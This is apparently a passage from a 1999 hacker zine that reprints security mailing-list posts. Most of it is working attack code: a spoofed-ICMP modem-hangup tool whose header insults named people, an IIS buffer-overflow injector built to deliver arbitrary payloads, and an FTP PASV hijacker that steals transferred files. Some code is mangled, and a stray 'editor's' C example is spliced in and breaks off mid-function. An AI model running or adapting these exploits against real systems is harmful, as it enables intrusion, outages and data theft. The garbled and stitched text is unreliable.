 * logistic ) you annoy me you stupid fuck, all authorities at PVPHS
 * (my old high school) i wish cancer upon you.
 * madcrew, you are gay
 * and, anyone else who isnt in my greets list =]
 *
 * [ disclaimer ]
 * i really dont see how i could get in trouble for this stupid program
 * its really not that great, but the legal system is gay these days,
 * so...this program is for educational purposes only, and the author
 * holds no liability for the actions of the people that use it, that
 * includes dwarfs, cyclopses, albinos, and anyone else who may happen
 * to use my program. dont modify or rip on this shit, suck me
 * -- amp
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define VERSION "1.2-05.05"    //fixed old compiler compatibility problems
#define FRIEND  "foo"

void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );

int main( int argc, char **argv )
{
    struct hostent *sourceinfo, *destinfo;
    struct sockaddr_in sin, din;
    int sockfd, numpackets, i;
    char *target, *source;

    banner();

    ( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;

    source = argv[1];
    target = argv[2];
    numpackets = ( atoi( argv[3] ) );

    signal( SIGINT, done );

    if( ( sourceinfo = gethostbyname( source ) ) == NULL )
    {
        printf( "cannot resolve source host!\n" );
        exit( -1 );
    }
    memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr, sourceinfo->h_length );
    sin.sin_family = AF_INET;

    if( ( destinfo = gethostbyname( target ) ) == NULL )
    {
        printf( "cannot resolve destination host!\n" );
        exit( -1 );
    }
    memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr, destinfo->h_length );
    din.sin_family = AF_INET;

    if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
    {
        printf( "Cannot get raw socket, you must be root!\n" );
        exit( -1 );
    }

    printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
    printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
    printf( "Number\t\t\t: %d\n", numpackets );
    printf( "Have some gin sucka" );

    for( i = 0; i < numpackets; i++ )
        gin( sockfd, sin, din );

    printf( "\n\nsent %d packet%c...done\n", numpackets,
            ( numpackets > 1 ) ? 's' : ( char )NULL );

    return 0;
}

void usage( char *name )
{
    printf( "usage: %s \n[ http://www.rootshell.com/ ] \n\n", name );
    exit( 0 );
}

void banner( void )
{
    printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );
    printf( "compiled for: %s\n\n", FRIEND );
}

char *get_progname( char *fullname )
{
    char *retval = strrchr( fullname, '/' );
    return retval ? ++retval : fullname;
}

void done( int foo )
{
    puts( "Exiting...\n" );
    exit( 1 );
}

void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )
{
    char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
    char *packet;
    int total;
    struct iphdr *ip;
    struct icmphdr *icmp;
    size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr );
    size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval );
    int len = strlen( ginstring );

    packet = ( char * )malloc( iphlen + icplen + len );
    ip = ( struct iphdr * )packet;
    icmp = ( struct icmphdr * )( packet + iphlen );

    ( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )],
                          ( struct timezone * )NULL );

    memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 ) );

    ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );
    ip->version = 4;
    ip->ihl = 5;
    ip->tos = 0;
    ip->ttl = 255;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = sin.sin_addr.s_addr;
    ip->daddr = din.sin_addr.s_addr;
    ip->check = in_chksum( ( u_short * )ip, iphlen );

    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 ) ) );

    total = ( iphlen + icplen + timlen + len + 16 );

    sendto( port, packet, total, 0, ( struct sockaddr * )&din,
            sizeof( struct sockaddr ) );

    free( packet );
}

// stolen from smurf
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
    register int nleft = iplen;
    register int sum = 0;
    u_short answer = 0;

    while( nleft > 1 )
    {
        sum += *ipbuf++;
        nleft -= 2;
    }

    if( nleft == 1 )
    {
        *( u_char * )( &answer ) = *( u_char * )ipbuf;
        sum += answer;
    }

    sum = ( sum >> 16 ) + ( sum + 0xffff );
    sum += ( sum >> 16 );
    answer = ~sum;

    return( answer );
}
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---

Also note: some machines seg fault when they run this, and setting the
environment variable MALLOC_CHECK_ to 1 seems to solve this.
And..this code will probably come out all offset and break when you try
to compile it...so just fix it, it compiles fine (i use g++ -O3 -o gin
gin.c).

amp

@HWA

115.0 IIS Remote Exploit (injection code)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 16 Jun 1999 08:58:05 -0700
From: Greg Hoglund
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IIS Remote Exploit (injection code)

I read yesterday on eEye.com that they had discovered a buffer overflow
in IIS. I could not resist writing an exploit. I did not have time to
design a really cool payload for this exploit, so I simply wrote the
injection code. However, this is meaningful for several reasons.

Attached is the injection code. The exploit will deliver any payload of
your choosing. Your payload will be executed. This empowers you to
create a "collection" of payloads that are not dependent upon the
injection vector in any way. This decoupling is important for military
needs, where a single injection vector needs to work, but the "warhead"
may be different depending on the target's characterization.

The exploit was fairly simple to build. In short, I read on eEye.com
that they had overflowed IIS with something like a ~3000 character URL.
Within minutes I had caused IIS to crash with EIP under my control. I
used a special pattern in the buffer (see code) to make it easy for me
to identify where EIP was being popped from. The pattern also made it
easy to determine where I was jumping around. Use the tekneek Danielson.
;-)

So, I controlled EIP, but I needed to get back to my stack segment, of
course. This is old school, and I really lucked out. Pushed down two
levels on the stack was an address for my buffer. I couldn't have asked
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to. It had two pop's followed by a return. This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer.
So, I landed in a weird place, had to add a near jump to get to somewhere
more useful.. nothing special, and here we are with about 2K of payload
space.

If you don't supply any mobile code to be run, the injection vector will
supply some for you. The default payload is simply a couple of no-ops
followed by a debug breakpoint (interrupt 3)... It's easy to play with
if you want to build your own payloads.. just keep a debugger attached
to inetinfo.exe on the target machine.

Lastly, I would simply like to point out that monoculture installations
are very dangerous. It's a concept from agribusiness.. if you have all
one crop, and a virus comes along that can kill that crop, you're out of
business. With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture. And, it's not just IIS. The
backbone of the Internet is built on common router technology (such as
cisco IOS). If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?

<--- snip

// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a number of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can be delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include
#include
#include

void main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
        fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
                "http://www.rootkit.com\nUsage: %s \n", argv[0]);
        exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(80);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char theSploit[4096];
            // fill pattern
            char kick = 'z'; //0x7a
            char place = 'A';

            // my uber sweet pattern gener@t0r
            for(int i=0;i<4096;i+=4)
            {
                theSploit[i] = kick;
                theSploit[i+1] = place;
                theSploit[i+2] = place + 1;
                theSploit[i+3] = place + 2;

                if(++place == 'Y') // beyond 'XYZ'
                {
                    place = 'A';
                    if(--kick < 'a') kick = 'a';
                }
            }

            _snprintf(theSploit, 5, "get /");
            _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");

            // after crash, looks like inetinfo.exe is jumping to the address
            // stored @ location 'GHtG' (0x47744847)
            // cross reference back to the buffer pattern, looks like we need
            // to store our EIP into theSploit[598]

            // magic eip into NTDLL.DLL
            theSploit[598] = (char)0xF0;
            theSploit[599] = (char)0x8C;
            theSploit[600] = (char)0xF8;
            theSploit[601] = (char)0x77;

            // code I want to execute
            // will jump foward over the
            // embedded eip, taking us
            // directly to the payload
            theSploit[594] = (char)0x90; //nop
            theSploit[595] = (char)0xEB; //jmp
            theSploit[596] = (char)0x35; //
            theSploit[597] = (char)0x90; //nop

            // the payload. This code is executed remotely.
            // if no payload is supplied on stdin, then this default
            // payload is used. int 3 is the debug interrupt and
            // will cause your debugger to "breakpoint" gracefully.
            // upon examination you will find that you are sitting
            // directly in this code-payload.
            if(argc < 3)
            {
                theSploit[650] = (char) 0x90; //nop
                theSploit[651] = (char) 0x90; //nop
                theSploit[652] = (char) 0x90; //nop
                theSploit[653] = (char) 0x90; //nop
                theSploit[654] = (char) 0xCC; //int 3
                theSploit[655] = (char) 0xCC; //int 3
                theSploit[656] = (char) 0xCC; //int 3
                theSploit[657] = (char) 0xCC; //int 3
                theSploit[658] = (char) 0x90; //nop
                theSploit[659] = (char) 0x90; //nop
                theSploit[660] = (char) 0x90; //nop
                theSploit[661] = (char) 0x90; //nop
            }
            else
            {
                // send the user-supplied payload from
                // a file. Yes, that's a 2K buffer for
                // mobile code. Yes, that's big.
                FILE *in_file;
                in_file = fopen(argv[2], "rb");
                if(in_file)
                {
                    int offset = 650;
                    while( (!feof(in_file)) && (offset < 3000))
                    {
                        theSploit[offset++] = fgetc(in_file);
                    }
                    fclose(in_file);
                }
            }

            send(s, theSploit, strlen(theSploit), 0);
        }
        closesocket(s);
    }
}

@HWA

116.0 ActiveX security revisited
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 9 Jun 1999 12:22:00 +0100
From: "Steve Loughran"
Subject: ActiveX Security Revisited

The latest Microsoft security bulletin
(http://www.microsoft.com/security/bulletins/ms99-018.asp) includes two
Internet Explorer patches. The first is a classic stack overrun - a web
page can supply an icon for use when adding to the favourite links list,
and a malformed icon could overrun the stack and so execute arbitrary
code.

The second fault is a security hole in an ActiveX control, and is a
simple instantiation of the problem covered in RISKS-18.85 and
RISKS-18.86, namely that code signing is a far less safe method of
software distribution than a 'sandbox' for untrusted code. It so happens
that one of the ActiveX controls dating from IE3 can be used to test for
the presence or absence of files on a hard disk, and while no access to
the contents is granted, it can be used to build up a picture of what
applications are installed.
My demonstration page (http://www.iseran.com/ActiveX/filesearch.html)
shows a naive script looking for common windows files in well known
places - it could just as easily look for well known applications as a
preamble to an application specific attack.

The insecure 'Preloader' control has some interesting properties.
Firstly, it is signed by Microsoft, showing that even the inventors of
ActiveX and the entire Win32 API did not test their controls rigorously
enough. Secondly, some distributions of Internet Explorer may have
automatically installed the control, in which case the control download
or signature verification process is bypassed.

It so happens that the default security settings of the Outlook and
Outlook Express e-mail messages, which means anyone could send a web
page referencing the control to any known recipient and stand a moderate
chance of being able to enumerate some disk files, possibly with no
visible notification to the recipient. This strikes me as a more serious
problem than the risk incurred by looking at random web pages, as it
enables attacks targeted at individual recipients.

Within four weeks of notifying Microsoft via their security e-mail alias
the company announced the problem, and withdrew the control from their
own web site, which seems a reasonable response time. Of course, if
ActiveX had included a mechanism whereby the signer of a control could
retroactively revoke that control then it would have been trivial to
disable the control remotely. Instead the company had to patch IE to
permanently disable the control. Few other companies would have this
luxury.

While enabling or disabling ActiveX use for web site access is entirely
a matter of preference, I would personally recommend that all users of
Microsoft e-mail applications alter their e-mail client security
settings so that neither ActiveX nor scripting language is supported in
incoming messages. This can be done by setting the e-mail security zone
to 'restricted'.
-Steve

-----------------------------------------------------------------------------

The ActiveX Hard Disk Explorer

This page uses the ability of the preloader control to report the presence or absence of a file or url to a controlling script. It loops through a number of "Well known" files to determine information about the user's system. This information could be fed back to a web server for marketing reasons, or used to test for the presence of other security weaknesses which could be exploited.

The example script is not very smart and does not use the results of initial tests to determine further directions of investigation. For example, even if the absence of the file c:\boot.ini reliably indicates there is no version of NT installed, the script still looks for the OS in common locations. The results of individual tests are stored, and could be used for better searching, or could be fed back to a server with ease.

Examining the source shows how this could be accomplished. Oh, and if you mail this to someone who uses Outlook to read their mail, guess what happens when they get it? Recipients will have to be grateful this file search is not done after a page load, and that the results are not sent back to the server.

June 1999: Within a few weeks of notifying Microsoft the errant control has been removed from their site, although there is nothing to stop mischievous web site authors from serving the control locally, as is done here. A patch to IE actually disables the control for good.

@HWA

117.0 denial of service attack against NT PDC from Win95 workstation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 4 Jun 1999 14:01:01 -0700
Reply-To: Carl Byington
Sender: Windows NT BugTraq Mailing List
From: Carl Byington
Subject: denial of service attack against NT PDC from Win95 workstation

I searched the archives, but did not find this one discussed.

We have an NT PDC and a bunch of Win95 workstations. The NT domain name is AAA
and the PDC netbios machine name is BBB. Normally, the Win95 workstations are
configured to logon to the NT domain, and with the identification tab set to
workgroup=AAA. This works nicely. However, we misconfigured a Win95 box with
workgroup=BBB.

No symptoms were evident until the server was rebooted after a power failure
(properly handled by an APC UPS). We then got the 'BBB is not a valid computer
name' which caused the workstation service to fail to start, and that in turn
prevented a bunch of other stuff from starting. The event log entry pointed to
the IP address of the PDC as being responsible for trying to add the
conflicting name BBB.

We could manually start the affected services, starting with the workstation
service. At that point, things seemed to be more or less normal, but user
manager for domains had problems opening the user list. These symptoms seemed
to be similar to those listed in MS article Q166184, but we don't have RAS
installed on that machine, and we don't have any static WINS entries. However,
we did not scroll thru the full list of workstations in the WINS database, or
we would have seen the Win95 workstation that had registered the name BBB.

At this point, we deleted the entire WINS database and rebooted the server.
Things worked normally until that workstation again registered its name as
BBB, but this time the event log pointed to the workstation IP so we could
finally track it down.
The server is running NT4, SP3.

PGP key available from the key servers. Key fingerprint
95 F4 D3 94 66 BA 92 4E 06 1E 95 F8 74 A8 2F A0
http://www.five-ten-sg.com

@HWA

118.0 Microsoft win2k PASV vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 15 Jun 1999 10:39:34 -0700
From: Greg Hoglund
To: BUGTRAQ@netspace.org
Subject: Microsoft win2k PASV vulnerability

Many people are aware of an old vulnerability with FTP servers. The problem is
related to not authenticating the source address of PASV port connections. To
add insult to injury, many FTP servers also open these ports in sequential
order.

Now, I would expect that many of the older installations out on the 'Net would
be vulnerable. However, I would not expect the latest Beta release of
Microsoft Windows 2000 server to have this vulnerability. Come on people!
After discovering this problem on my W2k installation, I tested it against
ftp.microsoft.com. No surprises.. their public ftp server is vulnerable also.

Now, using FTP w/o SSH in the first place is a bad idea. However, I still
think that this vulnerability is easy to fix and of all things it shouldn't be
present in win2k. My wu-ftp install doesn't have this problem.

I dug around on the net to see if anyone had written a script for this. I
found "pizzathief" for solaris. I re-wrote the program for NT and added some
features. The source code for "PizzaThief32" is posted below.

<--- snip

/*
 * PizzaThief32 Exploit written by Greg Hoglund
 *
 * Special thanks to Jeffrey R. Gerber for thinking of such a cool name
 * and to Bret McDanel for writing pizzathief for solaris!
 *
 * A common problem with FTP servers around the world results from
 * "passive mode". A client will issue the PASV command and the
 * server will in turn open a local port and wait for the client to
 * connect. Once the client connects, the server will transmit the
 * file or directory listing or whatever big chunk of data the client
 * wanted. The crux of the problem is that many FTP servers do not
 * check the source address of the connecting client. Hence, if the
 * men in black manage to connect to that port before you do, you lose
 * your file to someone else! And if this problem wasn't old as mold
 * already, Microsoft's Windows 2000 FTP server (version 5.0 I think)
 * has the problem. In fact, so does Microsoft's *public* FTP site!
 * And the icing on the cake is many FTP servers open PASV ports in
 * sequential order making the guesswork easy.
 *
 * This 'sploit runs under Windows NT and uses nonblocking i/o to snag
 * as much data as possible. The code is cleaned up a bit, and the
 * tool will now snag connections in a cycle.
 */

#include
#include
#include

#define NUMSOCK 64
#define FLAG_VERBOSE (0x1 << 1)
#define FLAG_STDOUT (0x1 << 2)

int connserver(char *host,int port);
int netgets(char *buff, int len, int sd);
void dumpdata(int theSocket, struct in_addr ip, unsigned short port);
int pizzaman32(struct in_addr ip, unsigned short port);

unsigned long gFlags = 0;
unsigned long gTimeout = 5000;

main(int argc, char **argv)
{
    int sd, count;
    struct in_addr ip;
    char buff[1024],*ptr1;
    unsigned short int port;
    WSADATA wsaData;

    if(0 != WSAStartup(MAKEWORD(2,0), &wsaData))
    {
        WSACleanup();
        fprintf(stderr, "Could not load winsock DLL\n");
        exit(0);
    }

    if(argc < 2)
    {
        fprintf(stderr, "Pizzathief32 for NT!\nFrom the Law Offices of Hoglund, " \
            "McDanel, & Gerber\nUsage: %s [-v -tTimeout -s] " \
            "\n options: -v Verbose\n " \
            "-t timeout in ms\n -s dump to stdout\n",argv[0]);
        exit(0);
    }

    count = 0;
    while(argv[++count][0] == '-'){
        switch(argv[count][1]){
            case 'v':
                gFlags |= FLAG_VERBOSE;
                break;
            case 't':
                if(isdigit(argv[count][2]))
                    gTimeout = atoi(&argv[count][2]);
                break;
            case 's':
                gFlags |= FLAG_STDOUT;
                break;
            default:
                break;
        }
    }

    if( (count < argc) && ((sd=connserver(argv[count],21)) < 0) )
    {
        fprintf(stderr, "could not connect to server");
        exit(0);
    }

    while(1)
    {
        if(netgets(buff,sizeof(buff),sd)==0)
        {
            fprintf(stderr, "server closed control connection\n");
            closesocket(sd);
            exit(0);
        }

        if(!strncmp(buff,"220 ",4))
        {
            if(FLAG_VERBOSE & gFlags) fprintf(stdout, "requesting username\n");
            sprintf(buff,"user ftp\n");
            send(sd,buff,strlen(buff),0);
        }

        if(!strncmp(buff,"331 ",4))
        {
            if(FLAG_VERBOSE & gFlags) fprintf(stdout, "requesting password\n");
            sprintf(buff,"pass pizzaman@illuminati.gov\n");
            send(sd,buff,strlen(buff),0);
        }

        if(!strncmp(buff,"230 ",4))
        {
            if(FLAG_VERBOSE & gFlags) fprintf(stdout, "we are logged in now\n");
            sprintf(buff,"pasv\n");
            send(sd,buff,strlen(buff),0);
        }

        if(!strncmp(buff,"530 ",4))
        {
            /* invalid password */
            sprintf(buff,"quit\n");
            send(sd,buff,strlen(buff),0);
            closesocket(sd);
            fprintf(stderr, "User ftp wasnt allowed\n");
            exit(0);
        }

        if(!strncmp(buff,"227 ",4))
        {
            char seps[] = "()";
            char *token;

            /* PASV response */
            if(FLAG_VERBOSE & gFlags) fprintf(stdout, buff);

            /* first get the ip/port into the buffer */
            token = strtok(buff,seps);
            token = strtok((char *)NULL,")");

            /* now break off the IP part */
            ptr1=(char *)&ip;
            ptr1[0]=atoi(strtok(token,","));
            ptr1[1]=atoi(strtok((char *)NULL,","));
            ptr1[2]=atoi(strtok((char *)NULL,","));
            ptr1[3]=atoi(strtok((char *)NULL,","));

            /* now get the port number */
            ptr1=(char *)&port;
            ptr1[0]=atoi(strtok((char *)NULL,","));
            ptr1[1]=atoi(strtok((char *)NULL,","));

            sprintf(buff,"pasv\n"); // recirculate pasv connection
            send(sd,buff,strlen(buff),0);

            pizzaman32(ip,port);
        }
    }
    return(0);
}

int connserver(char *host,int port)
{
    int sd,addr;
    struct hostent *he;
    struct sockaddr_in sa;

    /* try to resolve the host */
    if((addr=inet_addr(host))!= -1)
    {
        /* dotted decimal */
        memcpy(&sa.sin_addr,(char *)&addr,sizeof(addr));
    }
    else
    {
        if((he=gethostbyname(host))==NULL)
        {
            fprintf(stderr, "Unable to resolve %s\n", host);
            return(-1);
        }
        memcpy(&sa.sin_addr,he->h_addr,he->h_length);
    }

    sa.sin_port=htons(port);
    sa.sin_family=AF_INET;

    if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
    {
        perror("socket");
        return(-1);
    }

    if(connect(sd,(struct sockaddr *)&sa,sizeof(sa))<0)
    {
        perror("connect");
        return(-1);
    }
    return(sd);
}

int netgets(char *buff, int len, int sd)
{
    int i;

    memset(buff,0,len);
    for(i=0;i 0)
    {
        if(char_recv > 0)
        {
            if(aFlag)
            {
                aFlag = 0;
                ioctlsocket(theSocket, FIONBIO, &aFlag); //block on this transfer
            }

            if(FLAG_VERBOSE & gFlags) fprintf(stdout, "*** Got data for %s\n", aFilename);

            if(FLAG_STDOUT & gFlags)
            {
                buff[char_recv] = NULL;
                fprintf(stdout, "%s", buff);
            }
            else
            {
                if(NULL == out_file)
                {
                    out_file = fopen(aFilename, "wb");
                }
                if(out_file)
                {
                    fwrite(buff, char_recv, 1, out_file);
                }
            }
        }
    }

    if((FLAG_VERBOSE & gFlags) && (0 == char_recv)) fprintf(stdout, "server closed connection\n");

    if(out_file) fclose(out_file);
}

@HWA

119.0 useradd -p stores cleartext passwords / shadow-980724
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 11 Jun 1999 10:11:29 EET
From: Emils Klotins
To: BUGTRAQ@netspace.org
Subject: useradd -p stores cleartext passwords / shadow-980724

Hello.

Sorry if this is reported already. Didn't find it in Bugtraq archives nor in
SuSE support db.

OS: SuSE Linux 6.1
Program: useradd
Package: shadow-980724

Problem description:

'useradd' command has an option '-p password' for specifying password to the
newly added user. (This option btw, does not appear anywhere in useradd man
page)

If you specify this option along with a password, the password will be stored
in /etc/shadow, but in cleartext, creating 2 problems:

1. The password is stored in cleartext
2. It of course does not work, for upon login an encrypted version of password
   is expected to be in /etc/shadow.

PS. I could agree that specifying password in command-line can be considered
quite dangerous, however, if the option is there, it should either work
correctly or not be there.
Emils Klotins                           e-mail: emils@mail.usis.bkc.lv
Systems Manager                         URL: http://www.usis.bkc.lv/
USIS Riga
7 Smilsu Str., Riga LV1050, LATVIA

-------------------------------------------------------------------------------

Date: Fri, 11 Jun 1999 16:02:50 -0400
From: "Roche-Kelly, Edmund B."
To: BUGTRAQ@netspace.org
Subject: Re: useradd -p stores cleartext passwords / shadow-980724

I would think the obvious answer is that the password supplied as an argument
to -p is the encrypted password, generated by any of the mkpasswd utilities.
I agree it's odd that it's not mentioned in the man page.

Ed

-------------------------------------------------------------------------------

Date: Fri, 11 Jun 1999 19:32:03 -0500
From: James Sneeringer
To: BUGTRAQ@netspace.org
Subject: Re: useradd -p stores cleartext passwords / shadow-980724

On Fri, 11 Jun 1999, Roche-Kelly, Edmund B. wrote:
|
| I agree it's odd that it's not mentioned in the man page.

It was added to the man page in version 19990307. SuSE needs to update their
package. The current version is 19990607, available at
ftp://piast.t19.ds.pwr.wroc.pl/pub/linux/shadow/

-James

@HWA

120.0 UID 65536 and shadow-19990307 root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 24 May 1999 20:44:28 +0200
From: Lord Evil
To: BUGTRAQ@netspace.org
Subject: UID 65536 and shadow-19990307

Recently one of our admins installed the shadow-19990307 package. While
playing around I noticed that if a new user is created with UID 65536, he
will become root upon login. No root login will be logged, and even if the
tty isn't in /etc/securetty he will be allowed in. I don't think this is
normal behaviour :)

@HWA

121.0 big brother in your cc(!)
~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 15 Jun 1999 00:17:12 +1000
From: Darren Reed
To: BUGTRAQ@netspace.org
Subject: big brother in your cc

Whilst this isn't strictly speaking a security bug, it borders on Sun acting
in a very "big brother" manner which is frightening!
For those of you using Sun's SUNWspro C compiler package, beware! The binaries
"c89" and "cc" appear to automagically send an email to
"ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands, including some
sort of cpu-time summary. Extract as follows:

INFO unix i86pc SunOS 5.7
cc -E CPU-time 0.010000 0.010000
...
cc -o -Xa -O CPU-time 0.000000 0.060000
...
cc -o -Xa -O CPU-time 0.020000 0.050000

and so on.

Setting the environment variable UT_NO_USAGE_TRACKING seems to do the right
thing but for those that wish to enable this feature, check with strings on
the available environment settings to mediate this (search for UT_).

The mail is set to originate from "nobody" so it's unlikely you'll notice it
if it fails to be delivered unless you check your mail queue.

---------------------------------------------------------------------------

Date: Mon, 14 Jun 1999 23:33:09 +0200
From: Casper Dik
To: BUGTRAQ@netspace.org
Subject: Re: big brother in your cc

>Whilst this isn't strictly speaking a security bug, it borders on
>Sun acting in a very "big brother" manner which is frightening!
>
>For those of you using Sun's SUNWspro C compiler package, beware!
>The binaries "c89" and "cc" appear to automagically send an email
>to "ut-cc@sunpro.Eng.Sun.COM" with a list of C compiler commands,
>including some sort of cpu-time summary. Extract as follows:
>
>cc -E

(I have a strong sense of deja-vu, wasn't this discussed before on BUGTRAQ?
Ah wait, Usenet Oct '98)

This compiler "feature" only exists in the pre-FCS compilers (i.e., Alpha and
Beta products) and other pre-FCS workshop products. It was documented in
several locations, perhaps even in the "must read and agree to" license, but I
think it was pretty prominent. (The websites have gone now that FCS is here)

(Some older compilers inadvertently left the code in) 4.0? 4.1?

That is, unless you have a domainname set on your system that ends in
.sun.com; in that case usage tracking also happens with your FCS compiler.
So it's not all that big brotherish as you make it out:

- for alpha/beta only
- documented how to switch off (in several places)
- the cc command lines forwarded only include the options, not the option
  parameters or file name arguments. (-DFOO becomes -D, -Lpath gives -L etc ;
  file.c is not listed)

Nothing sinister, just alpha/beta users helping to gather statistics about
compiler option usage. (And us internal Sun folk who get to test drive all
stuff)

Of course, we could argue whether this should be an opt-in or opt-out thing
till we're blue in the face, but let's not.

Suffices to say that I've long since disabled most outgoing mail from my
system.

Casper

---------------------------------------------------------------------------

Date: Mon, 14 Jun 1999 20:00:05 +0100
From: Alec Muffett
To: BUGTRAQ@netspace.org
Subject: Old Software (Was: Re: big brother in your cc)

[Aleph - please expedite posting this if possible. Love'n'Hugs.]

>Whilst this isn't strictly speaking a security bug, it borders on
>Sun acting in a very "big brother" manner which is frightening!

Hi Guys,

The story I am told, is:

| This is VERY OLD NEWS. This info was collected as part of the
| Workshop 5.0 Early Access and Developer Release programs. It is
| *not*, I repeat, NOT turned on in the FCS release of the product.
| When customers downloaded the Early Access and Developer Release
| products off the web they were told this info was being collected via
| the FAQ and via the web security disclosure statement on the web
| site. In addition, the FAQ told them how to turn it off if they felt
| that it was data they did not want to divulge.
|
| The Early Access and Developer Release web sites are long since
| defunct since the WS 5.0 product FCS in 2/2/99. It used to be located
| at http://access1.sun.com/workshop5.0ea.

...so, can anyone submit an instance of this happening with the non
early-access software?
- alec

---------------------------------------------------------------------------

Date: Tue, 15 Jun 1999 17:16:52 +1000
From: Darren Reed
To: BUGTRAQ@netspace.org
Subject: Re: big brother in your cc

I must admit that I'm quite embarrassed about bringing this up without
properly checking which versions, etc, had the described behaviour as it
doesn't appear in any of the FCS versions.

In some mail from Casper Dik, sie said:
>
> (I have a strong sense of deja-vu, wasn't this discussed before on
> BUGTRAQ? Ah wait, Usenet Oct '98)
>
> This compiler "feature" only exists in the pre-FCS compilers (i.e.,
> Alpha and Beta products) and other pre-FCS workshop products.

Yes, I should have checked more fully on systems I have at my disposal.

> It was documented in several locations, perhaps even in the
> "must read and agree to" license, but I think it was pretty prominent.

And like most licenses which people need to get through to install/get
software, I (like most people) tend to just click "yes" rather than `waste'
time reading it.

Still, I'd have rather seen the email come from foo@ rather than nobody@
(which has the effect of making it disappear via /dev/null if an error occurs
in delivery).

Darren

@HWA

122.0 TCP MD5 option problem (router DoS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 14 Jun 1999 14:29:54 -0400
From: Craig Metz
To: BUGTRAQ@netspace.org
Subject: TCP MD5 option problem

I was implementing the RFC 2385 ("Protection of BGP Sessions via the TCP MD5
Signature Option") option in the OpenBSD stack. For those who don't know the
significance of this option, it is used to provide some level of active
attack (primarily hijacking) protection for BGP sessions on Internet core
routers.

One thing I noticed about the spec is that TCP options are completely
excluded from the MAC function. The IOS TCP implementation doesn't appear to
do anything significant with TCP options and does not send any, and so,
therefore, this doesn't seem to be a problem on those systems.
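To make that gap concrete, here is an added example (editor's code, not part of Craig Metz's message or the zine): it lays out the exact bytes that RFC 2385 section 2.0 feeds to MD5 and shows that rewriting an MSS option in place leaves that input byte-for-byte unchanged, while appending an option does change it, because the data offset and the pseudo-header length are covered. The addresses, ports, key and payload are constructed placeholders.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define TCP_FIXED_HDR 20   /* TCP header without options */

/* One segment as RFC 2385 sees it: addresses in host order, fixed header
 * and options already in wire order. */
struct tcp_seg {
    uint32_t src_ip, dst_ip;
    uint8_t  hdr[TCP_FIXED_HDR];
    const uint8_t *opts;  size_t optlen;   /* multiple of 4 */
    const uint8_t *data;  size_t datalen;
};

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* Fixed TCP header in wire order; the data offset is derived from optlen. */
static void tcp_fixed_header(uint8_t *h, uint16_t sport, uint16_t dport, uint32_t seq,
                             uint32_t ack, uint8_t flags, uint16_t win, uint16_t cksum, size_t optlen)
{
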